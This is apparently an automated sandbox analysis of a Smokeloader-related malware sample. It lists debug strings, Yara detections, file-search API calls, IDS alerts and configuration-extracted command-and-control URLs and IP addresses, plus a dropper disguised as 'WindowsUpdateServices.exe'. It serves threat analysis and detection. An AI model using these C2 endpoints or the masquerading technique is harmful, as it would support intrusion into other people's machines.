                        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402440948.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465108618.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400126816.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461133186.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403595756.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465829275.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: DE5A.exe, 00000016.00000002.2469647177.00007FFDFB279000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: DE5A.exe, 00000015.00000003.2397605685.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2479674945.00007FFE1A533000.00000002.00000001.01000000.00000010.sdmp, DE5A.exe, 00000027.00000003.2457880872.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2595982386.00007FFE11573000.00000002.00000001.01000000.00000020.sdmp
                        Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401603005.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464007360.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399657698.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460572839.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401138877.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463261633.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403192503.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465288220.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399541989.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460460068.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400503433.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461614650.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399105753.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460002090.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: DE5A.exe, 00000016.00000002.2474040580.00007FFE11581000.00000040.00000001.01000000.0000001C.sdmp, DE5A.exe, 0000002E.00000002.2596230418.00007FFE11581000.00000040.00000001.01000000.0000002C.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399228016.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460126912.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401237563.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463409848.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403306598.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465418399.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401906192.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464449776.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401603005.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464007360.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398865544.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459784606.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: DE5A.exe, 00000016.00000002.2477389116.00007FFE1A49E000.00000040.00000001.01000000.00000014.sdmp
                        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399105753.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460002090.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdbUGP source: DE5A.exe, 00000016.00000002.2473628005.00007FFE00521000.00000002.00000001.01000000.0000000E.sdmp, DE5A.exe, 0000002E.00000002.2593349908.00007FFDFF1F1000.00000002.00000001.01000000.0000001E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: DE5A.exe, 00000016.00000002.2474846626.00007FFE11BB1000.00000040.00000001.01000000.00000017.sdmp
                        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403595756.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465829275.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401906192.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464449776.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: DE5A.exe, 00000016.00000002.2469647177.00007FFDFB311000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: DE5A.exe, 00000016.00000002.2471761427.00007FFDFF2C4000.00000040.00000001.01000000.0000001B.sdmp, DE5A.exe, 0000002E.00000002.2594679915.00007FFE00524000.00000040.00000001.01000000.0000002B.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399325096.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460226793.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400772483.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462415733.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398865544.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459784606.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401722785.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464273860.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403192503.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465288220.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2469647177.00007FFDFB311000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399777885.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460682343.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402440948.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465108618.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403984086.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466348879.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401474807.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463811905.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401013743.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462996367.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: DE5A.exe, 00000015.00000003.2399448628.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460344804.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: DE5A.exe
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: DE5A.exe, 00000016.00000002.2477766609.00007FFE1A4CC000.00000040.00000001.01000000.00000013.sdmp, DE5A.exe, 0000002E.00000002.2599019605.00007FFE1A52C000.00000040.00000001.01000000.00000023.sdmp
                        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399908877.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460830926.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: DE5A.exe, 00000016.00000002.2475545585.00007FFE1A451000.00000040.00000001.01000000.0000001D.sdmp, DE5A.exe, 0000002E.00000002.2597768086.00007FFE1A451000.00000040.00000001.01000000.0000002D.sdmp
                        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400256199.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461293936.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403438900.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465611078.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: DE5A.exe, 00000015.00000003.2400644859.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461857558.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: DE5A.exe, 00000016.00000002.2475199806.00007FFE11BD1000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401722785.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464273860.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp

                        Spreading

                        Source: Yara match | File source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000003D.00000000.2500162285.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000042.00000000.2533489068.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000042.00000002.2546695187.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000003D.00000002.2538043211.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000002E.00000003.2495171507.000001E8E7A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Code function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Code function: 0_2_00402902 FindFirstFileW,0_2_00402902
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Code function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_009FE472
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009FDC54
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A0A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A0A087
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A0A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A0A1E2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A0A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00A0A570
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A066DC FindFirstFileW,FindNextFileW,FindClose,10_2_00A066DC
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009CC622 FindFirstFileExW,10_2_009CC622
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00A073D4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A07333 FindFirstFileW,FindClose,10_2_00A07333
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009FD921
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A0A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A0A087
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A0A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A0A1E2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_009FE472
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A0A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00A0A570
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A066DC FindFirstFileW,FindNextFileW,FindClose,13_2_00A066DC
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009CC622 FindFirstFileExW,13_2_009CC622
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00A073D4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_00A07333 FindFirstFileW,FindClose,13_2_00A07333
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_009FD921
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_009FDC54
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_001BA087
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_001BA1E2
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,20_2_001AE472
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,20_2_001BA570
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001B66DC FindFirstFileW,FindNextFileW,FindClose,20_2_001B66DC
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001B7333 FindFirstFileW,FindClose,20_2_001B7333
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,20_2_001B73D4
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_001AD921
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_001ADC54
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99C8D00 FindFirstFileExW,FindClose,21_2_00007FF6C99C8D00
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99D8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,21_2_00007FF6C99D8670
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Code function: 21_2_00007FF6C99E26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00007FF6C99E26C4
                        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\
                        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
                        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
                        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
                        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
                        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49739 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49740 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49741 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49742 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49744 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49745 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49747 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 179.159.229.64:80
                        Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49749 -> 179.159.229.64:80
                        Source: C:\Windows\explorer.exeNetwork Connect: 65.108.69.93 443Jump to behavior
                        Source: C:\Windows\explorer.exeNetwork Connect: 179.159.229.64 80Jump to behavior
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000000.2500162285.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533489068.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546695187.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2538043211.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495171507.000001E8E7A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        Source: Malware configuration extractorURLs: http://cellc.org/tmp/index.php
                        Source: Malware configuration extractorURLs: http://h-c-v.ru/tmp/index.php
                        Source: Malware configuration extractorURLs: http://icebrasilpr.com/tmp/index.php
                        Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/index.php
                        Source: Malware configuration extractorURLs: http://piratia.su/tmp/index.php
                        Source: Malware configuration extractorURLs: 193.149.176.178
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                        Source: global trafficTCP traffic: 192.168.2.4:49751 -> 193.149.176.178:2404
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 104.21.79.229 104.21.79.229
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: ALABANZA-BALTUS ALABANZA-BALTUS
                        Source: Joe Sandbox ViewASN Name: DANISCODK DANISCODK
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 193.149.176.178
